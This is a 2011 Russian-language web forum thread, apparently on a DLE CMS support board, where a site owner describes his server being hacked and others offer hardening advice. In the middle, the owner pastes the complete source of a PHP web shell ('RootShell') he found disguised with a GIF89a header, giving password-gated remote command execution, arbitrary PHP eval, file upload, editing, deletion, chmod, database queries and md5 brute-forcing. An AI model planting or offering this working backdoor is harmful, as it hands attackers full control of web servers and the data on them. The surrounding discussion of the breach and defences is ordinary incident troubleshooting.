6748222 1 Опубликовано: 2 апреля 2011 Рассказать Опубликовано: 2 апреля 2011 (изменено) ето как он мне HTACESS поменял? <Limit GET POST> order deny,allow deny from all allow from all </Limit> <Limit PUT DELETE> order deny,allow deny from all </Limit> DirectoryIndex index.php RewriteEngine On # Редиректы RewriteRule ^page/(.*)$ index.php?cstart=$1 [L] # Сам пост RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&cstart=$5&news_name=$6 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page,([0-9]+),(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/print:page,([0-9]+),(.*).html(/?)+$ engine/print.php?subaction=showfull&year=$1&month=$2&day=$3&news_page=$4&news_name=$5 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/(.*).html(/?)+$ index.php?subaction=showfull&year=$1&month=$2&day=$3&news_name=$4 [L] RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$4&news_page=$2&cstart=$3 [L] RewriteRule ^([^.]+)/page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$2 [L] RewriteRule ^([^.]+)/print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$2&newsid=$3 [L] RewriteRule ^([^.]+)/([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2 [L] RewriteRule ^page,([0-9]+),([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$3&news_page=$1&cstart=$2 [L] RewriteRule ^page,([0-9]+),([0-9]+)-(.*).html(/?)+$ index.php?newsid=$2&news_page=$1 [L] RewriteRule ^print:page,([0-9]+),([0-9]+)-(.*).html(/?)+$ engine/print.php?news_page=$1&newsid=$2 [L] RewriteRule ^([0-9]+)-(.*).html(/?)+$ index.php?newsid=$1 [L] # За день RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2&day=$3 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&day=$3&cstart=$4 [L] # За весь месяц RewriteRule ^([0-9]{4})/([0-9]{2})(/?)+$ index.php?year=$1&month=$2 [L] RewriteRule ^([0-9]{4})/([0-9]{2})/page/([0-9]+)(/?)+$ index.php?year=$1&month=$2&cstart=$3 [L] # Вывод за весь год RewriteRule ^([0-9]{4})(/?)+$ index.php?year=$1 [L] RewriteRule ^([0-9]{4})/page/([0-9]+)(/?)+$ index.php?year=$1&cstart=$2 [L] # вывод отдельному тегу RewriteRule ^tags/([^/]*)(/?)+$ index.php?do=tags&tag=$1 [L] RewriteRule ^tags/([^/]*)/page/([0-9]+)(/?)+$ index.php?do=tags&tag=$1&cstart=$2 [L] # вывод для отдельного юзера RewriteRule ^user/([^/]*)/rss.xml$ engine/rss.php?subaction=allnews&user=$1 [L] RewriteRule ^user/([^/]*)(/?)+$ index.php?subaction=userinfo&user=$1 [L] RewriteRule ^user/([^/]*)/page/([0-9]+)(/?)+$ index.php?subaction=userinfo&user=$1&cstart=$2 [L] RewriteRule ^user/([^/]*)/news(/?)+$ index.php?subaction=allnews&user=$1 [L] RewriteRule ^user/([^/]*)/news/page/([0-9]+)(/?)+$ index.php?subaction=allnews&user=$1&cstart=$2 [L] RewriteRule ^user/([^/]*)/news/rss.xml(/?)+$ engine/rss.php?subaction=allnews&user=$1 [L] # вывод всех последних новостей RewriteRule ^lastnews/(/?)+$ index.php?do=lastnews [L] RewriteRule ^lastnews/page/([0-9]+)(/?)+$ index.php?do=lastnews&cstart=$1 [L] # вывод в виде каталога RewriteRule ^catalog/([^/]*)/rss.xml$ engine/rss.php?catalog=$1 [L] RewriteRule ^catalog/([^/]*)(/?)+$ index.php?catalog=$1 [L] RewriteRule ^catalog/([^/]*)/page/([0-9]+)(/?)+$ index.php?catalog=$1&cstart=$2 [L] # вывод непрочитанных статей RewriteRule ^newposts(/?)+$ index.php?subaction=newposts [L] RewriteRule ^newposts/page/([0-9]+)(/?)+$ index.php?subaction=newposts&cstart=$1 [L] # Статистические страницы RewriteRule ^static/(.*).html(/?)+$ index.php?do=static&page=$1 [L] # вывод избранных статей RewriteRule ^favorites(/?)+$ index.php?do=favorites [L] RewriteRule ^favorites/page/([0-9]+)(/?)+$ index.php?do=favorites&cstart=$1 [L] RewriteRule ^rules.html$ index.php?do=rules [L] RewriteRule ^statistics.html$ index.php?do=stats [L] RewriteRule ^addnews.html$ index.php?do=addnews [L] RewriteRule ^rss.xml$ engine/rss.php [L] RewriteRule ^sitemap.xml$ uploads/sitemap.xml [L] RewriteCond %{REQUEST_FILENAME} !-d RewriteRule ^([^.]+)/page/([0-9]+)(/?)+$ index.php?do=cat&category=$1&cstart=$2 [L] RewriteRule ^([^.]+)/?$ index.php?do=cat&category=$1 [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^([^.]+)/rss.xml$ engine/rss.php?do=cat&category=$1 [L] RewriteRule ^page,([0-9]+),([^/]+).html$ index.php?do=static&page=$2&news_page=$1 [L] RewriteRule ^print:([^/]+).html$ engine/print.php?do=static&page=$1 [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteRule ^([^/]+).html$ index.php?do=static&page=$1 [L] AuthName cheats.lv IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti* саит был в оффлине режиме Изменено 2 апреля 2011 пользователем 6748222 Цитата Ссылка на сообщение Поделиться на других сайтах
FreeRider 8 Опубликовано: 2 апреля 2011 Рассказать Опубликовано: 2 апреля 2011 А ссылку на сайт можно?) 1 Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 2 апреля 2011 Рассказать Опубликовано: 2 апреля 2011 Ну на самом деле проверено уже на опыте, что не обязательно ломают ДЛЕ, а вы например сипользуете дистрибутив продукта, который был скачан до нахождения багов каких-либо... Потом заплатки то сделали, но у вас то дистрибутив старый был, как у меня и про дырки то я забыл... Вот и меня взломали... Но сейчас все подправил и исправил... Советую вам сделать как и я: -сделать фтп доступ только по маске айпи своего, чтоб кроме вас на него никто не попал -сделать доступ к файлу админки тоже только по маске своего айпишника, чтобы и туда никто не попал.. Ну и проверить на оффсайте, все ли у вас дыры залатаны... 1 Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 2 апреля 2011 Рассказать Опубликовано: 2 апреля 2011 (изменено) Автор у меня с саит (ригинал "чистий") дле 9.2 + рефферал модуль, но саит бил в оффлинe PS. www.cheats.lv -сделать фтп доступ только по маске айпи своего, чтоб кроме вас на него никто не попал -сделать доступ к файлу админки тоже только по маске своего айпишника, чтобы и туда никто не попал.. а где можно почитать об етом MeGo EGYPTi0N-H4X0rZ Security said hohoho u are cheats.lv owner ? =)) know me ? ! http://cheats.lv/ ^^ btw i still have got root server and ur new server =)) good luck ^^ типо через хостинг? Изменено 2 апреля 2011 пользователем 6748222 Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 2 апреля 2011 Рассказать Опубликовано: 2 апреля 2011 ето как он мне HTACESS поменял? не скрипт DLE, ни любой другой скрипт не мог вам изменить файл .htaccess в корне, по причине банального отсутствия на него прав на запись. Более того DLE не текстовый редактор, редактировать подобные файлы и дописывать в них произвольный текст, он попросту не умеет. Так что проблему вам в данном вопросе нужно искать не в скриптах, а на своем сервере и проблемы у вас в безопасности вашего сервера. MeGo EGYPTi0N-H4X0rZ Security said hohoho u are cheats.lv owner ? =)) know me ? ! http://cheats.lv/ ^^ btw i still have got root server and ur new server =)) good luck ^^ Это вам такое сообщение пришло? Злоумышленник имеет root доступ к вашему серверу. Так что скрипты к этому точно не могут иметь никакого отношения. Доступ был украден либо у вас с копьютера, либо уязвимости в серверном ПО. 1 Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 2 апреля 2011 Рассказать Опубликовано: 2 апреля 2011 (изменено) Автор купил хостинг на 3 года Арабы.. бл** Это вам такое сообщение пришло? от взломшикa Изменено 2 апреля 2011 пользователем 6748222 Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 2 апреля 2011 Рассказать Опубликовано: 2 апреля 2011 Автор ../backup GIF89aP; <?GIF89aP; error_reporting(0); //If there is an error, we'll show it, k? $password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars. $me = basename(__FILE__); $cookiename = "wieeeee"; if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh? { if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5. { $_POST['pass'] = md5($_POST['pass']); } if($_POST['pass'] == $password) { setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in } reload(); } if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)) { login(); die(); } // //Do not cross this line! All code placed after this block can't be executed without being logged in! // if(isset($_GET['p']) && $_GET['p'] == "logout") { setcookie ($cookiename, "", time() - 3600); reload(); } if(isset($_GET['dir'])) { chdir($_GET['dir']); } $pages = array( 'cmd' => 'Execute Command', 'eval' => 'Evaluate PHP', 'mysql' => 'MySQL Query', 'chmod' => 'Chmod File', 'phpinfo' => 'PHPinfo', 'md5' => 'md5 cracker', 'headers' => 'Show headers', 'logout' => 'Log out' ); //The header, like it? $header = '<html> <title>'.getenv("HTTP_HOST").' ~ Shell I</title> <head> <style> td { font-size: 12px; font-family: verdana; color: #33FF00; background: #000000; } #d { background: #003000; } #f { background: #003300; } #s { background: #006300; } #d:hover { background: #003300; } #f:hover { background: #003000; } pre { font-size: 10px; font-family: verdana; color: #33FF00; } a:hover { text-decoration: none; } input,textarea,select { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 10px; border-left-color: #33FF00; background: #000000; border-bottom-width: 1px; border-bottom-color: #33FF00; color: #33FF00; border-top-color: #33FF00; font-family: verdana; border-right-width: 1px; border-right-color: #33FF00; } hr { color: #33FF00; background-color: #33FF00; height: 5px; } </style> </head> <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900"> <table width=100%><td id="header" width=100%> <p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="'.$me.'">Home</a>] '; foreach($pages as $page => $page_name) { $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] '; } $header .= '<br><hr>'.show_dirs('.').'</td><tr><td>'; print $header; $footer = '<tr><td><hr><center>© <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>'; // //Page handling // if(isset($_REQUEST['p'])) { switch ($_REQUEST['p']) { case 'cmd': //Run command print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>"; if(isset($_REQUEST['command'])) { print "<pre>"; execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that? } break; case 'edit': //Edit a fie if(isset($_POST['editform'])) { $f = $_GET['file']; $fh = fopen($f, 'w') or print "Error while opening file!"; fwrite($fh, $_POST['editform']) or print "Couldn't save file!"; fclose($fh); } print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">"; if(file_exists($_GET['file'])) { $rd = file($_GET['file']); foreach($rd as $l) { print htmlspecialchars($l); } } print "</textarea><input type=submit value=\"Save\"></form>"; break; case 'delete': //Delete a file if(isset($_POST['yes'])) { if(unlink($_GET['file'])) { print "File deleted successfully."; } else { print "Couldn't delete file."; } } if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes'])) { print "Are you sure you want to delete ".$_GET['file']."?<br> <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST> <input type=hidden name=yes value=yes> <input type=submit value=\"Delete\"> "; } break; case 'eval': //Evaluate PHP code print "<form action=\"".$me."?p=eval\" method=POST> <textarea cols=60 rows=10 name=\"eval\">"; if(isset($_POST['eval'])) { print htmlspecialchars($_POST['eval']); } else { print "print \"Yo Momma\";"; } print "</textarea><br> <input type=submit value=\"Eval\"> </form>"; if(isset($_POST['eval'])) { print "<h1>Output:</h1>"; print "<br>"; eval($_POST['eval']); } break; case 'chmod': //Chmod file print "<h1>Under construction!</h1>"; if(isset($_POST['chmod'])) { switch ($_POST['chvalue']){ case 777: chmod($_POST['chmod'],0777); break; case 644: chmod($_POST['chmod'],0644); break; case 755: chmod($_POST['chmod'],0755); break; } print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue']."."; } if(isset($_GET['file'])) { $content = urldecode($_GET['file']); } else { $content = "file/path/please"; } print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod: <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b> <select name=\"chvalue\"> <option value=\"777\">777</option> <option value=\"644\">644</option> <option value=\"755\">755</option> </select><input type=submit value=\"Change\">"; break; case 'mysql': //MySQL Query if(isset($_POST['host'])) { $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error()); mysql_select_db($_POST['dbase']); $sql = $_POST['query']; $result = mysql_query($sql); } else { print " This only queries the database, doesn't return data!<br> <form action=\"".$me."?p=mysql\" method=POST> <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br> <b>Username:<br><input type=text name=username value=\"root\" size=10><br> <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br> <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br> <b>Query:<br></b<textarea name=query></textarea> <input type=submit value=\"Query database\"> </form> "; } break; case 'createdir': if(mkdir($_GET['crdir'])) { print 'Directory created successfully.'; } else { print 'Couldn\'t create directory'; } break; case 'phpinfo': //PHP Info phpinfo(); break; case 'rename': if(isset($_POST['fileold'])) { if(rename($_POST['fileold'],$_POST['filenew'])) { print "File renamed."; } else { print "Couldn't rename file."; } } if(isset($_GET['file'])) { $file = basename(htmlspecialchars($_GET['file'])); } else { $file = ""; } print "Renaming ".$file." in folder ".realpath('.').".<br> <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST> <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br> <b>To:<br><input type=text name=filenew value=\"\" size=10><br> <input type=submit value=\"Rename file\"> </form>"; break; case 'md5': if(isset($_POST['md5'])) { if(!is_numeric($_POST['timelimit'])) { $_POST['timelimit'] = 30; } set_time_limit($_POST['timelimit']); if(strlen($_POST['md5']) == 32) { if($_POST['chars'] == "9999") { $i = 0; while($_POST['md5'] != md5($i) && $i != 100000) { $i++; } } else { for($i = "a"; $i != "zzzzz"; $i++) { if(md5($i == $_POST['md5'])) { break; } } } if(md5($i) == $_POST['md5']) { print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>"; } } } print "Will bruteforce the md5 <form action=\"".$me."?p=md5\" method=POST> <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br> <b>Characters:</b><br><select name=\"chars\"> <option value=\"az\">a - zzzzz</option> <option value=\"9999\">1 - 9999999</option> </select> <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br> <input type=submit value=\"Bruteforce md5\"> </form><br>*: if set_time_limit is allowed by php.ini"; break; case 'headers': foreach(getallheaders() as $header => $value) { print htmlspecialchars($header . ":" . $value)."<br>"; } break; } } else //Default page that will be shown when the page isn't found or no page is selected. { $files = array(); $directories = array(); if(isset($_FILES['uploadedfile']['name'])) { $target_path = realpath('.').'/'; $target_path = $target_path . basename( $_FILES['uploadedfile']['name']); if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) { print "File:". basename( $_FILES['uploadedfile']['name']). " has been uploaded"; } else{ echo "File upload failed!"; } } print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>"; if ($handle = opendir('.')) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $directories[] = $file; } else { $files[] = $file; } } asort($directories); asort($files); foreach($directories as $file) { print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; } foreach($files as $file) { print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>"; } } else { print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>"; } print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\"> <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" /> <input type=\"submit\" value=\"Upload File\" /> </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td> <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form> </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td> </table>"; } function login() { print "<table border=0 width=100% height=100%><td valign=\"middle\"><center> <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b> <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\"> </form>"; } function reload() { header("Location: ".basename(__FILE__)); } function get_execution_method() { if(function_exists('passthru')){ $m = "passthru"; } if(function_exists('exec')){ $m = "exec"; } if(function_exists('shell_exec')){ $m = "shell_ exec"; } if(function_exists('system')){ $m = "system"; } if(!isset($m)) //No method found :-| { $m = "Disabled"; } return($m); } function execute_command($method,$command) { if($method == "passthru") { passthru($command); } elseif($method == "exec") { exec($command,$result); foreach($result as $output) { print $output."<br>"; } } elseif($method == "shell_exec") { print shell_exec($command); } elseif($method == "system") { system($command); } } function perm($file) { if(file_exists($file)) { return substr(sprintf('%o', fileperms($file)), -4); } else { return "????"; } } function get_color($file) { if(is_writable($file)) { return "green";} if(!is_writable($file) && is_readable($file)) { return "white";} if(!is_writable($file) && !is_readable($file)) { return "red";} } function show_dirs($where) { if(ereg("^c:",realpath($where))) { $dirparts = explode('\\',realpath($where)); } else { $dirparts = explode('/',realpath($where)); } $i = 0; $total = ""; foreach($dirparts as $part) { $p = 0; $pre = ""; while($p != $i) { $pre .= $dirparts[$p]."/"; $p++; } $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/"; $i++; } return "<h2>".$total."</h2><br>"; } print $footer; // Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-) exit(); ?> саит находитса в режиме оффлине с момента покупки хостинга 0_о PS. когда проверял с дле AntiVirusom скрипт он нечего ненашол Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 На самом деле ломают и мой сайт. Например после просмотра сайта техподдержкой, сказали что все дыры устранены и добавили что то дополнительно, были сменены все паролии от БД, от админки, от фтп, от хостинга, поставлен везде доступ только по моему айпи, ну и к вечеру ситуация повторилась, в админке НОВЫЙ администратор. Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 (изменено) Автор Я удалил ДЛЕ с хостинга и хакер пропал, и некакова роот ацесса у него нету Уменя всё серёзно так как мой саит закозали на снос у Арабоф! Изменено 3 апреля 2011 пользователем 6748222 Цитата Ссылка на сообщение Поделиться на других сайтах
DeeMon 73 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 и некакова роот ацесса у него нету Уверены? Я помню как то было массово подобное, тогда помню пострадал сайт CMS Small Nuke, тоже всё ходили слухи о дыре в ней, выяснилось просто дырявый сервак, так как было помимо их сайта взломано ещё почти 40-50 и все на том сервере. К хостеру с проблемой обращались? Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 Автор ну хостер скозал проверал и нету Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 Автор Beru slova obratno DLE neprichom tolko chto polnostju vsjo udalili u menja s FTP Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 076 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 Beru slova obratno DLE neprichom tolko chto polnostju vsjo udalili u menja s FTP Вам это сказали сразу, а вы почему то не поверили. Есть вещи, которые через DLE или другие скрипты нельзя сделать в принципе. Например нельзя редактировать файлы на которые нет прав на запись, а в DLE только строгий набор файлов имеет или может иметь права на запись. Файлы в корне к этим файлам не относяться. И их нельзя отредактировать даже при наличии шелла на сервере, при условии что ваш сервер имеет правилные права безопасности.На самом деле ломают и мой сайт. Например после просмотра сайта техподдержкой, сказали что все дыры устранены и добавили что то дополнительно, были сменены все паролии от БД, от админки, от фтп, от хостинга, поставлен везде доступ только по моему айпи, ну и к вечеру ситуация повторилась, в админке НОВЫЙ администратор. У вас ситуация несколько иная, у вас правились также файлы в корне именно по FTP, или через root доступ. Возможно что и подправили в самих файлах, у вас проверяли сайт до того как вам по FTP стали менять файлы скрипта в корне, после этого по FTP могли какие либо изменения незаметные внести. Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 (изменено) Автор у меня там 100% ккаято хрень, хостинг говарит что у них нету роот доступа, а я меняю парольи как дурак. Хакер в течение 30.. сек ~ 1. минуты меняет фаилы. Изменено 3 апреля 2011 пользователем 6748222 Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 Меняйте хостинг компанию или берите выделенный сервер и настраивайте вручную Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 Автор обидно оплатил на 3. Года и тут через 2 недели хрень пошла.. реално денги вернуть за хостинг? Цитата Ссылка на сообщение Поделиться на других сайтах
inokentik 45 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 Реально, если нормальный кошелек в вэбмани и платил через вэбмани, на счет остального не знаю... Я лично с агавы когда уходил возвращал деньги за пару месяцев хреновой работы портала.. Отдали как миленькие. Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 3 апреля 2011 Рассказать Опубликовано: 3 апреля 2011 Автор Ну я плотил через банк. Думаю завтра начинать переговоры о возврате денег с хостингом Цитата Ссылка на сообщение Поделиться на других сайтах
av2678880 0 Опубликовано: 6 апреля 2011 Рассказать Опубликовано: 6 апреля 2011 А что за хостинг такой? Цитата Ссылка на сообщение Поделиться на других сайтах
Japonec 8 Опубликовано: 9 апреля 2011 Рассказать Опубликовано: 9 апреля 2011 http://www.opennet.ru/opennews/art.shtml?num=28945 вот например интересная дирочка у кого такой стоит смтп...рут права даёт.. Цитата Ссылка на сообщение Поделиться на других сайтах
6748222 1 Опубликовано: 10 апреля 2011 Рассказать Опубликовано: 10 апреля 2011 Автор А что за хостинг такой? http://tere.lv Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.